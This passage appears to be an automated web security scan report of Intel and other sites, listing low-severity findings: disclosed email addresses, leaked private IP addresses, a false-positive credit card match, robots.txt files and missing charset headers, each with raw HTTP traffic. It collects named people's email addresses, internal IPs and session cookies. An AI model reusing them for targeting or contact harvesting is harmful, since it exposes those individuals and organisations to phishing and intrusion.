Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="es-MX">
<head>
<meta http-equiv=Content-Type content="text/html; charset=UTF-8">

...[SNIP]...
<a href="mailto:gabriel.leonardo.andriollo@bm.com">
...[SNIP]...
<a href="mailto:francisca.oliva@bm.com">
...[SNIP]...
<a href="mailto:manuela.munoz@bm.com">
...[SNIP]...
<a href="mailto:raquel.golcher.beirute@intel.com">
...[SNIP]...
<a href="mailto:claudiaa@fidal-amlat.org">
...[SNIP]...
<a href="mailto:teresa.menendez@yr.com">
...[SNIP]...
<a href="mailto:anaite.hernandez@bm.com">
...[SNIP]...
<a href="mailto:itzel.castellanos@bm.com">
...[SNIP]...
<a href="mailto:jahiro.polo@bm.com">
...[SNIP]...
<a href="mailto:anator@creativaempresarial.com">
...[SNIP]...
<a href="mailto:marcela.vaccaro@bm.com">
...[SNIP]...
<a href="mailto:natalia.arbex@bm.com">
...[SNIP]...
<a href="mailto:manuela.munoz@bm.com">
...[SNIP]...
<a href="mailto:gabriel.leonardo.andriollo@bm.com">
...[SNIP]...

19.47. http://www.intel.com/homepage/js/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /homepage/js/main.js

Issue detail

The following email address was disclosed in the response:
  • bhb@iceburg.net

Request

GET /homepage/js/main.js HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_lv=1296945247431; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 17 Jan 2011 19:49:10 GMT
Accept-Ranges: bytes
ETag: "fca9a9c7fb6cb1:433e"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:01 GMT
Connection: close
Content-Length: 114524

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...
<bhb@iceburg.net>
...[SNIP]...

19.48. http://www.intel.com/sites/wap/cim_setup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /sites/wap/cim_setup.js

Issue detail

The following email address was disclosed in the response:
  • aaron.a.fischer@intel.com

Request

GET /sites/wap/cim_setup.js HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_lv=1296945247431; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 29 Jul 2005 17:34:16 GMT
Accept-Ranges: bytes
ETag: "63ea77be6394c51:426c"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:01 GMT
Connection: close
Content-Length: 2366

// cim_setup.js
//
// Author: Aaron Fischer (aaron.a.fischer@intel.com)
// Created: 2004.10.08
// Description: Expands the wa_setup.js API with additional methods for programmatically
// accessing a web page's metadata.

var pathObj = ParseURLPa
...[SNIP]...

19.49. http://www.intel.com/sitewide/js/jquery-plugins.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /sitewide/js/jquery-plugins.js

Issue detail

The following email address was disclosed in the response:
  • ganeshread@gmail.com

Request

GET /sitewide/js/jquery-plugins.js HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 14:46:43 GMT
Accept-Ranges: bytes
ETag: "1f517e331becb1:42bb"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:08 GMT
Connection: close
Content-Length: 49527

/**
**********************************************************************************
PLEASE NOTE!
THIS IS A MODIFIED VERSION OF JCAROUSELLITE TO ALLOW FOR "PAUSE" FUNCTIONALITY.
http://www.er
...[SNIP]...
llbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext:
...[SNIP]...

19.50. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:
  • osi@opensource.org
  • webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:15 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bu17mduk7is8kedhijahsmb432; expires=Tue, 01-Mar-2011 02:50:35 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 05 Feb 2011 23:16:15 GMT
ETag: "5bc4ba8773ce80095954738aa6226440"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

19.51. http://www.sigcse.org/
 previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sigcse.org
Path:   /<BR/

Issue detail

The following email addresses were disclosed in the response:
  • daniel.joyce@villanova.edu
  • webmaster@sigcse.org

Request

GET /<BR/ HTTP/1.1
Host: www.sigcse.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:15:20 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org
Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 10731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<a href="mailto:daniel.joyce@villanova.edu">
...[SNIP]...
<a href="mailto:webmaster@sigcse.org">
...[SNIP]...

19.52. http://www.w3.org/1999/XSL/Transform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /1999/XSL/Transform

Issue detail

The following email address was disclosed in the response:
  • webmaster@w3.org

Request

GET /1999/XSL/Transform HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:32:28 GMT
Server: Apache/2
Content-Location: Transform.html
Vary: negotiate,accept,Accept-Encoding
TCN: choice
Last-Modified: Wed, 12 May 2010 21:03:51 GMT
ETag: "7f3-4866bfa9c1bc0;b4-46552f8754040"
Accept-Ranges: bytes
Content-Length: 2035
Cache-Control: max-age=21600
Expires: Sun, 06 Feb 2011 05:32:28 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=iso-8859-1

<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:rddl="http://www.rddl.org/" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="tex
...[SNIP]...
<a href="mailto:webmaster@w3.org">
...[SNIP]...

20. Private IP addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


20.1. http://ark.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ark.intel.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.18.8.222

Request

GET /?iid=gg_prod-en_US+ark HTTP/1.1
Host: ark.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P: C1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=76390
Date: Sat, 05 Feb 2011 23:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 174001


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head id="ctl00_ctl00_Head1">
   <script la
...[SNIP]...
<![CDATA[
           function GetIdent() { return "10.18.8.222"; }
           
           function GetReportSuiteName() {
               return "intelmatark";
           }
           function GetSearchKeywords() {
               return "";
           }
       // ]]>
...[SNIP]...

20.2. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.2.128.186

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=ecf040374803e538bd55ad8d0e2e3590e4758659323071ed57f7524ccb84e0a0; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22082 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3359

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg Mobile
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, p
...[SNIP]...
<span title="10.2.128.186 Build: 198 - Wed Feb 2 16:30:12 PST 2011">
...[SNIP]...

20.3. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.2.129.225

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.225 Build: 198 - Wed Feb 2 16:30:12 PST 2011">
...[SNIP]...

20.4. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.2.130.26

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:52:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Mon, 07-Feb-2011 01:52:59 GMT; path=/; domain=digg.com
Set-Cookie: d=93a16908ae0173f410bdf4843d598fa77820d1fc451b8618b115021fc5586e1a; expires=Fri, 05-Feb-2021 12:00:39 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21162 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7632

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.130.26 Build: 198 - Wed Feb 2 16:30:12 PST 2011">
...[SNIP]...

21. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdata.youtube.com
Path:   /feeds/api/videos/gpzM6Mask80/related

Issue detail

The following credit card number was disclosed in the response:
  • 4031753540039

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /feeds/api/videos/gpzM6Mask80/related HTTP/1.1
Host: gdata.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 200 OK
X-GData-User-Country: FR
Content-Type: application/atom+xml; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:23:13 GMT
Date: Sat, 05 Feb 2011 23:23:13 GMT
Cache-Control: private, max-age=300, no-transform
Vary: *
GData-Version: 1.0
Last-Modified: Sat, 05 Feb 2011 23:23:13 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close
Content-Length: 109865

<?xml version='1.0' encoding='UTF-8'?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:media='http://search.yahoo.com/mrss/' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:gd='http://
...[SNIP]...
<gml:pos>37.78300094604492 -122.4031753540039</gml:pos>
...[SNIP]...

22. Robots.txt file  previous  next
There are 4 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


22.1. http://inside.intel.com/LOPFeedMashup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPFeedMashup

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: inside.intel.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 01 Apr 2010 21:50:18 GMT
ETag: "42782-24-d93bfa80"
CacheHit: D=370 t=1296947548494694
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=3571
Expires: Sun, 06 Feb 2011 00:13:11 GMT
Date: Sat, 05 Feb 2011 23:13:40 GMT
Content-Length: 36
Connection: close

# go away
User-agent: *
Disallow: /

22.2. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY4N4CIOTeAioFZK8AAAEyBWCvAAAP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY4N4CIOTeAioFZK8AAAEyBWCvAAAP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Feb 2011 22:56:20 GMT
Date: Sun, 06 Feb 2011 02:14:49 GMT
Expires: Sun, 06 Feb 2011 02:14:49 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.3. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.4. http://www.intel.com/about/corporateresponsibility/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/index.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intel.com

Response

HTTP/1.0 200 OK
Content-Length: 458
Content-Type: text/plain
Last-Modified: Fri, 05 Mar 2010 20:06:22 GMT
Accept-Ranges: bytes
ETag: "e7a994539fbcca1:428c"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 05 Feb 2011 23:13:36 GMT
Connection: close

# robots.txt exclusion for www.intel.com
#

# for all agents, keep them out of the /cgi directory

User-agent: *
Disallow: /cgi
Disallow: /iaweb/
Disallow: /cpc/vision/
Disallow: /intel/june2
...[SNIP]...

23. HTML does not specify charset  previous  next
There are 49 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


23.1. http://ad.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.com
Path:   /

Request

GET / HTTP/1.1
Host: ad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:17:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:17:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=43a90b7fc41a5c241f48c5114ade8499; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=ad.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 215860
Connection: close

<b-ua>

23.2. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 23:21:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

23.3. http://lz1.intel.com/copyright/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lz1.intel.com
Path:   /copyright/

Request

GET /copyright/ HTTP/1.1
Host: lz1.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:17 GMT
Server: Microsoft-IIS/6.0
P: C2
X-Powered-By: ASP.NET
Content-Length: 4103
ETag: "adf03a8e1246ca1:19a9fc"
Last-Modified: Mon, 05 Oct 2009 23:21:24 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding

<HTML>
   <HEAD>
       <title>Copyright Permission</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="Visual Basic .NET 7.1" name="CODE_LANGUAGE">
       <meta con
...[SNIP]...

23.4. http://onsite2.researchintel.com/engine/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onsite2.researchintel.com
Path:   /engine/

Request

GET /engine/ HTTP/1.1
Host: onsite2.researchintel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD;

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Date: Sat, 05 Feb 2011 23:17:29 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

23.5. http://onsite2.researchintel.com/engine/icorescript.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onsite2.researchintel.com
Path:   /engine/icorescript.asp

Request

GET /engine/icorescript.asp?s=15&sid=&c=&geo=0&f=NONE HTTP/1.1
Host: onsite2.researchintel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
